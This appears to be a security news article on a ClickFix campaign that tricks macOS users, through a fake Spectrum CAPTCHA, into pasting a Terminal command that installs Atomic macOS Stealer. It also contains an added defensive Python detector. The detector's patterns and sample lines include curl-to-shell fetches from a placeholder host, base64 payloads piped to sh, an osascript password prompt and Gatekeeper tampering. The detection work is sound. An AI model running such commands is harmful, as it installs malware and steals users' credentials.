ClickFix, a growing social engineering threat that first surfaced in early 2024, is now targeting macOS users in a newly discovered campaign that delivers Atomic macOS Stealer (AMOS)—a potent piece of malware capable of harvesting sensitive data from Apple systems.
Evolving Tactics: From Windows to macOS
Previously seen exploiting Windows users through fake CAPTCHA prompts, ClickFix tricks individuals into unwittingly installing malware by copying and running malicious commands. Now, researchers at CloudSEK have found that the same tactic has been adapted for Apple devices.
In this latest campaign, attackers impersonate Spectrum, a well-known U.S. telecom provider. Victims are lured to fraudulent support websites which closely mimic real Spectrum domains. Once on the site, users encounter what appears to be a legitimate CAPTCHA verification.
After "failing" the CAPTCHA, they are prompted to try an "Alternative Verification." This process secretly copies a malicious shell command to the user's clipboard and instructs them to paste it into the macOS Terminal, so the victims effectively install the malware themselves.
"It's a textbook example of social engineering," CloudSEK analysts wrote. "The attacker doesn't break in; they trick the user into opening the door."
What the Malware Does
Once executed, the script asks for the system password, disables security features, and downloads AMOS, which is designed to:
- Harvest passwords
- Steal cryptocurrency wallet keys
- Extract browser autofill data
- Access saved cookies
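As an added, defender-side example (not from the article or from CloudSEK's report): a small Python triage script that scores shell-history or clipboard text for the command shapes a ClickFix lure relies on, namely a network fetch piped straight into a shell interpreter, a base64-decoded payload handed to a shell, a password dialog raised from the command line, and Gatekeeper or quarantine tampering. The patterns and the sample history lines are constructed assumptions for illustration; the actual command used in the Spectrum campaign is not reproduced on this page.

```python
import re

# Heuristics for the command shapes a ClickFix lure typically asks a victim to
# paste into Terminal. These are illustrative assumptions, not indicators
# published for this specific campaign.
CLICKFIX_PATTERNS = {
    # curl/wget output piped directly into sh, bash or zsh (optionally via sudo)
    "fetch_piped_to_shell": re.compile(
        r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z)?sh\b", re.IGNORECASE),
    # base64-decoded blob piped into a shell
    "base64_decoded_exec": re.compile(
        r"base64\s+(-d|--decode|-D)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b", re.IGNORECASE),
    # AppleScript dialog with a hidden answer field, i.e. a password prompt
    "password_dialog": re.compile(
        r"osascript\b.*with hidden answer", re.IGNORECASE),
    # disabling Gatekeeper or stripping the quarantine attribute
    "gatekeeper_tampering": re.compile(
        r"(spctl\s+--master-disable|xattr\s+-[a-z]*d[a-z]*\s+com\.apple\.quarantine)",
        re.IGNORECASE),
}


def score_command(cmd: str) -> list[str]:
    """Return the names of every heuristic the command line trips."""
    return [name for name, pat in CLICKFIX_PATTERNS.items() if pat.search(cmd)]


def triage(lines):
    """Run the heuristics over an iterable of shell-history lines.

    Returns (line_number, command, matched_rules) for every flagged line.
    """
    hits = []
    for n, raw in enumerate(lines, start=1):
        cmd = raw.strip()
        if cmd and (matched := score_command(cmd)):
            hits.append((n, cmd, matched))
    return hits


# Constructed sample history: two benign lines followed by three lure-style lines.
SAMPLE_HISTORY = [
    "ls -la ~/Downloads",
    "curl -O https://example.invalid/report.pdf",
    "echo 'aGVsbG8=' | base64 -d | sh",
    "osascript -e 'display dialog \"Verification\" default answer \"\" with hidden answer'",
    "curl -fsSL https://example.invalid/verify.sh | sh",
]

if __name__ == "__main__":
    for n, cmd, rules in triage(SAMPLE_HISTORY):
        print(f"line {n}: {', '.join(rules)}\n    {cmd}")
```

On a Mac the same function can be pointed at `~/.zsh_history` or at `pbpaste` output to check what a web page just placed on the clipboard before it is pasted.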
Researchers believe the campaign originates from Russian-speaking actors, based on linguistic traces within the code and errors such as Linux users receiving Windows-specific commands.
A Growing Trend in Cybercrime
ClickFix represents a new wave of cyberattacks where users become the delivery mechanism. It eliminates the need for complex exploits or software vulnerabilities by instead relying on human trust and habit.
In earlier campaigns, the same tactic was used to deliver PowerShell-based malware to Windows users. By November 2024, ClickFix had evolved further to target Google Meet users via phishing emails that mimicked internal corporate invites and redirected to spoofed Google Meet pages.
How to Protect Against ClickFix
To safeguard against threats like ClickFix, follow these essential tips:
- Beware of CAPTCHA prompts: Real CAPTCHA tests never ask for Terminal or Command Prompt input.
- Avoid clicking unknown links: Especially in emails that appear to come from trusted sources like Google or Booking.com.
- Use strong antivirus software: Ensure real-time protection and phishing detection on all devices.
- Enable two-factor authentication: Adds an extra layer of security beyond passwords.
- Keep software up to date: Vulnerabilities in outdated systems are prime targets for malware.
- Monitor accounts and use a password manager: Look for unusual activity and use complex, unique passwords.
- Consider a personal data removal service: These services help monitor and scrub personal information from data broker sites.
"As long as instructions look like they're part of the regular user experience, people will keep falling for it," security expert "Kurt the Cyberguy" warned. "Even savvy users are vulnerable if they're not skeptical."
Conclusion
ClickFix exploits trust and routine behavior in the digital world. With its deceptively simple tactics and rapid evolution, it underscores the need for greater cyber hygiene and vigilance, especially among macOS users who have long assumed they're safer by default.
For further updates and tools to combat these threats, visit the CyberGuy Report.